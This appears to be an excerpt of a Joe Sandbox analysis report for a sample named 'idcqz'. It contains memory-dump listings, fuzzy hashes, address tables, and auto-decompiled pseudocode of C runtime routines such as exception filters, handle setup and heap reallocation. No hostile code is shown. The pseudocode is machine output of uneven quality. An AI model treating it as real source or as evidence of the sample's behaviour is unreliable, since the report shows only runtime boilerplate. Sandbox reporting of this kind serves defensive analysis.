          0x00b5150e
          0x00b51511
          0x00b51518
          0x00b5151d
          0x00b514c0
          0x00b514c4
          0x00b514cd
          0x00b514d2
          0x00b514da
          0x00b514e0
          0x00000000
          0x00b514e0
          0x00b514be
          0x00b514ec

          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: __lock_file_memset
          • String ID:
          • API String ID: 26237723-0
          • Opcode ID: 206e60469a7bc96c2dea8f195b0ea8930146b8661a4298824820e64e5825f1ea
          • Instruction ID: 54c1a3732dc12712bc99fce4bf8c7fcefb2a4198813d408f0f512f2e4551b7ff
          • Opcode Fuzzy Hash: 206e60469a7bc96c2dea8f195b0ea8930146b8661a4298824820e64e5825f1ea
          • Instruction Fuzzy Hash: 6101D431800204ABCF21EFAC9C01B9E7BF1EF85322F008AD5FC241A261D7318A59DF92
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 275 b511df-b511f3 call b511f4
          C-Code - Quality: 25%
          			E00B511DF(intOrPtr _a4, intOrPtr _a8) {
          				void* __ebp;
          				void* _t3;
          				void* _t4;
          				void* _t5;
          				void* _t6;
          				void* _t9;
          
          				_push(0x40);
          				_push(_a8);
          				_push(_a4);
          				_t3 = E00B511F4(_t4, _t5, _t6, _t9); // executed
          				return _t3;
          			}









          0x00b511e2
          0x00b511e4
          0x00b511e7
          0x00b511ea
          0x00b511f3

          APIs
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: __wfsopen
          • String ID:
          • API String ID: 197181222-0
          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
          • Instruction ID: 081ec192a924cc1ac00fb16a88bde8ad02f8025a162b80c406cfb82a9ae70646
          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
          • Instruction Fuzzy Hash: 68B0927244020C77DE012A8AEC02B897B599B40660F0080A0FF0C28571A673AA649699
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00B543CC(struct _EXCEPTION_POINTERS* _a4) {
          
          				SetUnhandledExceptionFilter(0);
          				return UnhandledExceptionFilter(_a4);
          			}



          0x00b543d1
          0x00b543e1

          APIs
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00B543D1
          • UnhandledExceptionFilter.KERNEL32(?), ref: 00B543DA
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: e7a3252643128019a50aca0a052bb28e6c233f2962dcd6aac3ad3b4ede10b277
          • Instruction ID: 2886200b257b0aa7ab69cd6f45fd636f354c4f80a50a5cc04274f0bf461691e1
          • Opcode Fuzzy Hash: e7a3252643128019a50aca0a052bb28e6c233f2962dcd6aac3ad3b4ede10b277
          • Instruction Fuzzy Hash: D0B09235044708ABCB062FA1EC0EB483F28EB14653F000490F61D560609F72A6108A92
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E00B5439B(_Unknown_base(*)()* _a4) {
          
          				return SetUnhandledExceptionFilter(_a4);
          			}



          0x00b543a8

          APIs
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00B543A1
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: e11ba79da464787d1b6136316f70875f5ed1571546b06a10acfadb30186c9417
          • Instruction ID: bed5a01004ceb481d2bfeaf91b097ff938dde1c4fb2af83d690df91b412bff55
          • Opcode Fuzzy Hash: e11ba79da464787d1b6136316f70875f5ed1571546b06a10acfadb30186c9417
          • Instruction Fuzzy Hash: 86A0113000020CAB8A022B82EC0A8883F2CEA002A2B0000A0F80C020208B32AA208A82
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000005.00000002.972498932.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_110000_idcqz.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9596094dde73d7e1e650b9309008b19dd97b62653e2470f374a79ae706046c62
          • Instruction ID: f5806d8ee53088f4cdcbbc862930fd96f2c308bca7cb7617ce78d9b3fb3445e5
          • Opcode Fuzzy Hash: 9596094dde73d7e1e650b9309008b19dd97b62653e2470f374a79ae706046c62
          • Instruction Fuzzy Hash: C702F114C5D2E8ADDB06CBF944607FDBFB05D2A102F4845CAE0E5E6283C53A938EDB25
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 86%
          			E00B538A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
          				signed int _t82;
          				signed int _t86;
          				long _t90;
          				void* _t91;
          				signed int _t94;
          				signed int _t98;
          				signed int _t99;
          				signed char _t103;
          				signed int _t105;
          				intOrPtr _t106;
          				intOrPtr* _t109;
          				signed char _t111;
          				long _t119;
          				intOrPtr _t129;
          				signed int _t133;
          				void* _t135;
          				signed int _t138;
          				void** _t139;
          				signed int _t141;
          				signed int _t142;
          				signed int _t143;
          				signed int _t147;
          				signed int _t149;
          				void* _t150;
          				signed int _t154;
          				void* _t155;
          				void* _t156;
          
          				_push(0x64);
          				_push(0xb62260);
          				E00B52400(__ebx, __edi, __esi);
          				E00B5442F(0xb);
          				 *((intOrPtr*)(_t155 - 4)) = 0;
          				_push(0x40);
          				_t141 = 0x20;
          				_push(_t141);
          				_t82 = E00B54869();
          				_t133 = _t82;
          				 *(_t155 - 0x24) = _t133;
          				if(_t133 != 0) {
          					 *0xb64848 = _t82;
          					 *0xb650e4 = _t141;
          					while(1) {
          						__eflags = _t133 - 0x800 + _t82;
          						if(_t133 >= 0x800 + _t82) {
          							break;
          						}
          						 *((short*)(_t133 + 4)) = 0xa00;
          						 *_t133 =  *_t133 | 0xffffffff;
          						 *((intOrPtr*)(_t133 + 8)) = 0;
          						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
          						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
          						 *((short*)(_t133 + 0x25)) = 0xa0a;
          						 *((intOrPtr*)(_t133 + 0x38)) = 0;
          						 *((char*)(_t133 + 0x34)) = 0;
          						_t133 = _t133 + 0x40;
          						 *(_t155 - 0x24) = _t133;
          						_t82 =  *0xb64848; // 0x53f230
          					}
          					GetStartupInfoW(_t155 - 0x74);
          					__eflags =  *((short*)(_t155 - 0x42));
          					if( *((short*)(_t155 - 0x42)) == 0) {
          						L27:
          						_t129 = 0xfffffffe;
          						L28:
          						_t142 = 0;
          						__eflags = 0;
          						while(1) {
          							 *(_t155 - 0x2c) = _t142;
          							__eflags = _t142 - 3;
          							if(_t142 >= 3) {
          								break;
          							}
          							_t147 = (_t142 << 6) +  *0xb64848;
          							 *(_t155 - 0x24) = _t147;
          							__eflags =  *_t147 - 0xffffffff;
          							if( *_t147 == 0xffffffff) {
          								L33:
          								 *(_t147 + 4) = 0x81;
          								__eflags = _t142;
          								if(_t142 != 0) {
          									_t65 = _t142 - 1; // -1
          									asm("sbb eax, eax");
          									_t90 =  ~_t65 + 0xfffffff5;
          									__eflags = _t90;
          								} else {
          									_t90 = 0xfffffff6;
          								}
          								_t91 = GetStdHandle(_t90);
          								 *(_t155 - 0x1c) = _t91;
          								__eflags = _t91 - 0xffffffff;
          								if(_t91 == 0xffffffff) {
          									L45:
          									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
          									 *_t147 = _t129;
          									_t94 =  *0xb66100;
          									__eflags = _t94;
          									if(_t94 != 0) {
          										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
          									}
          									goto L47;
          								} else {
          									__eflags = _t91;
          									if(_t91 == 0) {
          										goto L45;
          									}
          									_t98 = GetFileType(_t91);
          									__eflags = _t98;
          									if(_t98 == 0) {
          										goto L45;
          									}
          									 *_t147 =  *(_t155 - 0x1c);
          									_t99 = _t98 & 0x000000ff;
          									__eflags = _t99 - 2;
          									if(_t99 != 2) {
          										__eflags = _t99 - 3;
          										if(_t99 != 3) {
          											L44:
          											_t71 = _t147 + 0xc; // -11946044
          											E00B540A2(_t71, 0xfa0, 0);
          											_t156 = _t156 + 0xc;
          											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
          											L47:
          											_t142 = _t142 + 1;
          											continue;
          										}
          										_t103 =  *(_t147 + 4) | 0x00000008;
          										__eflags = _t103;
          										L43:
          										 *(_t147 + 4) = _t103;
          										goto L44;
          									}
          									_t103 =  *(_t147 + 4) | 0x00000040;
          									goto L43;
          								}
          							}
          							__eflags =  *_t147 - _t129;
          							if( *_t147 == _t129) {
          								goto L33;
          							}
          							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
          							goto L47;
          						}
          						 *((intOrPtr*)(_t155 - 4)) = _t129;
          						E00B53B53();
          						_t86 = 0;
          						__eflags = 0;
          						L49:
          						return E00B52445(_t86);
          					}
          					_t105 =  *(_t155 - 0x40);
          					__eflags = _t105;
          					if(_t105 == 0) {
          						goto L27;
          					}
          					_t135 =  *_t105;
          					 *(_t155 - 0x1c) = _t135;
          					_t106 = _t105 + 4;
          					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
          					 *(_t155 - 0x20) = _t106 + _t135;
          					__eflags = _t135 - 0x800;
          					if(_t135 >= 0x800) {
          						_t135 = 0x800;
          						 *(_t155 - 0x1c) = 0x800;
          					}
          					_t149 = 1;
          					__eflags = 1;
          					 *(_t155 - 0x30) = 1;
          					while(1) {
          						__eflags =  *0xb650e4 - _t135; // 0x20
          						if(__eflags >= 0) {
          							break;
          						}
          						_t138 = E00B54869(_t141, 0x40);
          						 *(_t155 - 0x24) = _t138;
          						__eflags = _t138;
          						if(_t138 != 0) {
          							0xb64848[_t149] = _t138;
          							 *0xb650e4 =  *0xb650e4 + _t141;
          							__eflags =  *0xb650e4;
          							while(1) {
          								__eflags = _t138 - 0x800 + 0xb64848[_t149];
          								if(_t138 >= 0x800 + 0xb64848[_t149]) {
          									break;
          								}
          								 *((short*)(_t138 + 4)) = 0xa00;
          								 *_t138 =  *_t138 | 0xffffffff;
          								 *((intOrPtr*)(_t138 + 8)) = 0;
          								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
          								 *((short*)(_t138 + 0x25)) = 0xa0a;
          								 *((intOrPtr*)(_t138 + 0x38)) = 0;
          								 *((char*)(_t138 + 0x34)) = 0;
          								_t138 = _t138 + 0x40;
          								 *(_t155 - 0x24) = _t138;
          							}
          							_t149 = _t149 + 1;
          							 *(_t155 - 0x30) = _t149;
          							_t135 =  *(_t155 - 0x1c);
          							continue;
          						}
          						_t135 =  *0xb650e4; // 0x20
          						 *(_t155 - 0x1c) = _t135;
          						break;
          					}
          					_t143 = 0;
          					 *(_t155 - 0x2c) = 0;
          					_t129 = 0xfffffffe;
          					_t109 =  *((intOrPtr*)(_t155 - 0x28));
          					_t139 =  *(_t155 - 0x20);
          					while(1) {
          						__eflags = _t143 - _t135;
          						if(_t143 >= _t135) {
          							goto L28;
          						}
          						_t150 =  *_t139;
          						__eflags = _t150 - 0xffffffff;
          						if(_t150 == 0xffffffff) {
          							L22:
          							_t143 = _t143 + 1;
          							 *(_t155 - 0x2c) = _t143;
          							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
          							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
          							_t139 =  &(_t139[1]);
          							 *(_t155 - 0x20) = _t139;
          							continue;
          						}
          						__eflags = _t150 - _t129;
          						if(_t150 == _t129) {
          							goto L22;
          						}
          						_t111 =  *_t109;
          						__eflags = _t111 & 0x00000001;
          						if((_t111 & 0x00000001) == 0) {
          							goto L22;
          						}
          						__eflags = _t111 & 0x00000008;
          						if((_t111 & 0x00000008) != 0) {
          							L20:
          							_t154 = ((_t143 & 0x0000001f) << 6) + 0xb64848[_t143 >> 5];
          							 *(_t155 - 0x24) = _t154;
          							 *_t154 =  *_t139;
          							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
          							_t37 = _t154 + 0xc; // 0xd
          							E00B540A2(_t37, 0xfa0, 0);
          							_t156 = _t156 + 0xc;
          							_t38 = _t154 + 8;
          							 *_t38 =  *(_t154 + 8) + 1;
          							__eflags =  *_t38;
          							_t139 =  *(_t155 - 0x20);
          							L21:
          							_t135 =  *(_t155 - 0x1c);
          							goto L22;
          						}
          						_t119 = GetFileType(_t150);
          						_t139 =  *(_t155 - 0x20);
          						__eflags = _t119;
          						if(_t119 == 0) {
          							goto L21;
          						}
          						goto L20;
          					}
          					goto L28;
          				}
          				_t86 = E00B52600(_t155, 0xb63400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
          				goto L49;
          			}






























          0x00b538a8
          0x00b538aa
          0x00b538af
          0x00b538b6
          0x00b538be
          0x00b538c1
          0x00b538c5
          0x00b538c6
          0x00b538c7
          0x00b538ce
          0x00b538d0
          0x00b538d5
          0x00b538f2
          0x00b538f7
          0x00b538fd
          0x00b53902
          0x00b53904
          0x00000000
          0x00000000
          0x00b53906
          0x00b5390c
          0x00b5390f
          0x00b53912
          0x00b5391b
          0x00b5391e
          0x00b53924
          0x00b53927
          0x00b5392a
          0x00b5392d
          0x00b53930
          0x00b53930
          0x00b5393b
          0x00b53941
          0x00b53946
          0x00b53a7b
          0x00b53a7d
          0x00b53a7e
          0x00b53a7e
          0x00b53a7e
          0x00b53a80
          0x00b53a80
          0x00b53a83
          0x00b53a86
          0x00000000
          0x00000000
          0x00b53a91
          0x00b53a97
          0x00b53a9a
          0x00b53a9d
          0x00b53ab1
          0x00b53ab1
          0x00b53ab5
          0x00b53ab7
          0x00b53abe
          0x00b53ac3
          0x00b53ac5
          0x00b53ac5
          0x00b53ab9
          0x00b53abb
          0x00b53abb
          0x00b53ac9
          0x00b53acf
          0x00b53ad2
          0x00b53ad5
          0x00b53b23
          0x00b53b29
          0x00b53b2c
          0x00b53b2e
          0x00b53b33
          0x00b53b35
          0x00b53b3a
          0x00b53b3a
          0x00000000
          0x00b53ad7
          0x00b53ad7
          0x00b53ad9
          0x00000000
          0x00000000
          0x00b53adc
          0x00b53ae2
          0x00b53ae4
          0x00000000
          0x00000000
          0x00b53ae9
          0x00b53aeb
          0x00b53af0
          0x00b53af3
          0x00b53afd
          0x00b53b00
          0x00b53b0b
          0x00b53b12
          0x00b53b16
          0x00b53b1b
          0x00b53b1e
          0x00b53b3d
          0x00b53b3d
          0x00000000
          0x00b53b3d
          0x00b53b06
          0x00b53b06
          0x00b53b08
          0x00b53b08
          0x00000000
          0x00b53b08
          0x00b53af9
          0x00000000
          0x00b53af9
          0x00b53ad5
          0x00b53a9f
          0x00b53aa1
          0x00000000
          0x00000000
          0x00b53aa9
          0x00000000
          0x00b53aa9
          0x00b53b43
          0x00b53b46
          0x00b53b4b
          0x00b53b4b
          0x00b53b4d
          0x00b53b52
          0x00b53b52
          0x00b5394c
          0x00b5394f
          0x00b53951
          0x00000000
          0x00000000
          0x00b53957
          0x00b53959
          0x00b5395c
          0x00b5395f
          0x00b53964
          0x00b5396c
          0x00b5396e
          0x00b53970
          0x00b53972
          0x00b53972
          0x00b53977
          0x00b53977
          0x00b53978
          0x00b5397b
          0x00b5397b
          0x00b53981
          0x00000000
          0x00000000
          0x00b5398d
          0x00b5398f
          0x00b53992
          0x00b53994
          0x00b53a2e
          0x00b53a35
          0x00b53a35
          0x00b53a3b
          0x00b53a47
          0x00b53a49
          0x00000000
          0x00000000
          0x00b53a4b
          0x00b53a51
          0x00b53a54
          0x00b53a57
          0x00b53a5b
          0x00b53a61
          0x00b53a64
          0x00b53a67
          0x00b53a6a
          0x00b53a6a
          0x00b53a6f
          0x00b53a70
          0x00b53a73
          0x00000000
          0x00b53a73
          0x00b5399a
          0x00b539a0
          0x00000000
          0x00b539a0
          0x00b539a3
          0x00b539a5
          0x00b539aa
          0x00b539ab
          0x00b539ae
          0x00b539b1
          0x00b539b1
          0x00b539b3
          0x00000000
          0x00000000
          0x00b539b9
          0x00b539bb
          0x00b539be
          0x00b53a1b
          0x00b53a1b
          0x00b53a1c
          0x00b53a22
          0x00b53a23
          0x00b53a26
          0x00b53a29
          0x00000000
          0x00b53a29
          0x00b539c0
          0x00b539c2
          0x00000000
          0x00000000
          0x00b539c4
          0x00b539c6
          0x00b539c8
          0x00000000
          0x00000000
          0x00b539ca
          0x00b539cc
          0x00b539dc
          0x00b539e9
          0x00b539f0
          0x00b539f5
          0x00b539fc
          0x00b53a06
          0x00b53a0a
          0x00b53a0f
          0x00b53a12
          0x00b53a12
          0x00b53a12
          0x00b53a15
          0x00b53a18
          0x00b53a18
          0x00000000
          0x00b53a18
          0x00b539cf
          0x00b539d5
          0x00b539d8
          0x00b539da
          0x00000000
          0x00000000
          0x00000000
          0x00b539da
          0x00000000
          0x00b539b1
          0x00b538ea
          0x00000000

          APIs
          • __lock.LIBCMT ref: 00B538B6
            • Part of subcall function 00B5442F: __mtinitlocknum.LIBCMT ref: 00B54441
            • Part of subcall function 00B5442F: EnterCriticalSection.KERNEL32(00000000,?,00B537AB,0000000D), ref: 00B5445A
          • __calloc_crt.LIBCMT ref: 00B538C7
            • Part of subcall function 00B54869: __calloc_impl.LIBCMT ref: 00B54878
          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B538E2
          • GetStartupInfoW.KERNEL32(?,00B62260,00000064,00B51654,00B62190,00000014), ref: 00B5393B
          • __calloc_crt.LIBCMT ref: 00B53986
          • GetFileType.KERNEL32 ref: 00B539CF
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
          • String ID:
          • API String ID: 2772871689-0
          • Opcode ID: d6402149a5cc074d996e43fc5d6bcafdd986eff6fe9e94bf73c55c45bd5e47b4
          • Instruction ID: 85666d1cd3d5af5912f015226f0b979be600c8964c5d2bc88b89858143e3bfd1
          • Opcode Fuzzy Hash: d6402149a5cc074d996e43fc5d6bcafdd986eff6fe9e94bf73c55c45bd5e47b4
          • Instruction Fuzzy Hash: 1581E1719046458FCB14CF68C8817ADBBF0EF09761B2442EED8A6AB3D1C774DA46CB50
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 91%
          			E00B53815(void* __ebx, void* __edi, void* __eflags) {
          				void* __esi;
          				void* _t3;
          				intOrPtr _t6;
          				long _t14;
          				long* _t27;
          
          				E00B51890(_t3);
          				if(E00B54560() != 0) {
          					_t6 = E00B54001(E00B535A6);
          					 *0xb6350c = _t6;
          					__eflags = _t6 - 0xffffffff;
          					if(_t6 == 0xffffffff) {
          						goto L1;
          					} else {
          						_t27 = E00B54869(1, 0x3bc);
          						__eflags = _t27;
          						if(_t27 == 0) {
          							L6:
          							E00B5388B();
          							__eflags = 0;
          							return 0;
          						} else {
          							__eflags = E00B5405D( *0xb6350c, _t27);
          							if(__eflags == 0) {
          								goto L6;
          							} else {
          								_push(0);
          								_push(_t27);
          								E00B53762(__ebx, __edi, _t27, __eflags);
          								_t14 = GetCurrentThreadId();
          								_t27[1] = _t27[1] | 0xffffffff;
          								 *_t27 = _t14;
          								__eflags = 1;
          								return 1;
          							}
          						}
          					}
          				} else {
          					L1:
          					E00B5388B();
          					return 0;
          				}
          			}








          0x00b53815
          0x00b53821
          0x00b53830
          0x00b53835
          0x00b5383b
          0x00b5383e
          0x00000000
          0x00b53840
          0x00b5384d
          0x00b53851
          0x00b53853
          0x00b53882
          0x00b53882
          0x00b53887
          0x00b5388a
          0x00b53855
          0x00b53863
          0x00b53865
          0x00000000
          0x00b53867
          0x00b53867
          0x00b53869
          0x00b5386a
          0x00b53871
          0x00b53877
          0x00b5387b
          0x00b5387f
          0x00b53881
          0x00b53881
          0x00b53865
          0x00b53853
          0x00b53823
          0x00b53823
          0x00b53823
          0x00b5382a
          0x00b5382a

          APIs
          • __init_pointers.LIBCMT ref: 00B53815
            • Part of subcall function 00B51890: RtlEncodePointer.NTDLL(00000000,?,00B5381A,00B5163A,00B62190,00000014), ref: 00B51893
            • Part of subcall function 00B51890: __initp_misc_winsig.LIBCMT ref: 00B518AE
            • Part of subcall function 00B51890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B54117
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B5412B
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B5413E
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B54151
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B54164
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B54177
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B5418A
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B5419D
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B541B0
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B541C3
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B541D6
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B541E9
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B541FC
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B5420F
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B54222
            • Part of subcall function 00B51890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B54235
          • __mtinitlocks.LIBCMT ref: 00B5381A
          • __mtterm.LIBCMT ref: 00B53823
            • Part of subcall function 00B5388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B53828,00B5163A,00B62190,00000014), ref: 00B5447A
            • Part of subcall function 00B5388B: _free.LIBCMT ref: 00B54481
            • Part of subcall function 00B5388B: DeleteCriticalSection.KERNEL32(00B63558,?,?,00B53828,00B5163A,00B62190,00000014), ref: 00B544A3
          • __calloc_crt.LIBCMT ref: 00B53848
          • __initptd.LIBCMT ref: 00B5386A
          • GetCurrentThreadId.KERNEL32(00B5163A,00B62190,00000014), ref: 00B53871
          Memory Dump Source
          • Source File: 00000005.00000002.972676491.0000000000B51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B50000, based on PE: true
          • Associated: 00000005.00000002.972671079.0000000000B50000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972694472.0000000000B63000.00000004.00000001.01000000.00000005.sdmpDownload File
          • Associated: 00000005.00000002.972700094.0000000000B67000.00000002.00000001.01000000.00000005.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_b50000_idcqz.jbxd
          Similarity
          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
          • String ID:
          • API String ID: 3567560977-0
          • Opcode ID: 15e98c699610edf9cf344433740f712ffbf90b12a4c3715e48de52bf99d52db6
          • Instruction ID: 8ad26bf6f9295f4b79287b16bb74648a12381a73cb78de4d77a3b3fbba42fb29
          • Opcode Fuzzy Hash: 15e98c699610edf9cf344433740f712ffbf90b12a4c3715e48de52bf99d52db6
          • Instruction Fuzzy Hash: 7EF06D3251921159E26D77787C0274A2AC4CF01FB7B248AEEFC64DA2D2FF518A8A4690
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 95%
          			E00B57452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
          				void* _t7;
          				void* _t8;
          				intOrPtr* _t9;
          				intOrPtr* _t12;
          				void* _t20;
          				long _t31;
          
          				if(_a4 != 0) {
          					_t31 = _a8;
          					if(_t31 != 0) {
          						_push(__ebx);
          						while(_t31 <= 0xffffffe0) {
          							if(_t31 == 0) {
          								_t31 = _t31 + 1;
          							}
          							_t7 = HeapReAlloc( *0xb64834, 0, _a4, _t31);
          							_t20 = _t7;
          							if(_t20 != 0) {
          								L17:
          								_t8 = _t20;
          							} else {
          								if( *0xb64830 == _t7) {
          									_t9 = E00B51CC3();
          									 *_t9 = E00B51CD6(GetLastError());
          									goto L17;
          								} else {
          									if(E00B51741(_t7, _t31) == 0) {
          										_t12 = E00B51CC3();
          										 *_t12 = E00B51CD6(GetLastError());
          										L12:
          										_t8 = 0;
          									} else {
          										continue;
          									}
          								}
          							}
          							goto L14;
          						}
          						E00B51741(_t6, _t31);
          						 *((intOrPtr*)(E00B51CC3())) = 0xc;
          						goto L12;
          					} else {
          						E00B54831(_a4);
          						_t8 = 0;
          					}
          					L14:
          					return _t8;
          				} else {
          					return E00B5114D(__ebx, __edx, __edi, _a8);
          				}
          			}









          0x00b57459
          0x00b57467
          0x00b5746c
          0x00b5747b
          0x00b574ae
          0x00b57480
          0x00b57482
          0x00b57482
          0x00b5748f
          0x00b57495
          0x00b57499
          0x00b574f9
          0x00b574f9
          0x00b5749b
          0x00b574a1
          0x00b574e3
          0x00b574f7
          0x00000000
          0x00b574a3
          0x00b574ac
          0x00b574cb
          0x00b574df
          0x00b574c5
          0x00b574c5
          0x00000000
          0x00000000
          0x00000000
          0x00b574ac
          0x00b574a1
          0x00000000
          0x00b574c7
          0x00b574b4
          0x00b574bf
          0x00000000
          0x00b5746e
          0x00b57471
          0x00b57477
          0x00b57477
          0x00b574c8
          0x00b574ca
          0x00b5745b
          0x00b57465
          0x00b57465

          APIs
          • _malloc.LIBCMT ref: 00B5745E
            • Part of subcall function 00B5114D: __FF_MSGBANNER.LIBCMT ref: 00B51164
            • Part of subcall function 00B5114D: __NMSG_WRITE.LIBCMT ref: 00B5116B
            • Part of subcall function 00B5114D: RtlAllocateHeap.NTDLL(00510000,00000000,00000001,00000000,00000000,00000000,?,00B548C7,00000000,00000000,00000000,00000000,?,00B544F9,00000018,00B62280), ref: 00B51190
          • _free.LIBCMT ref: 00B57471
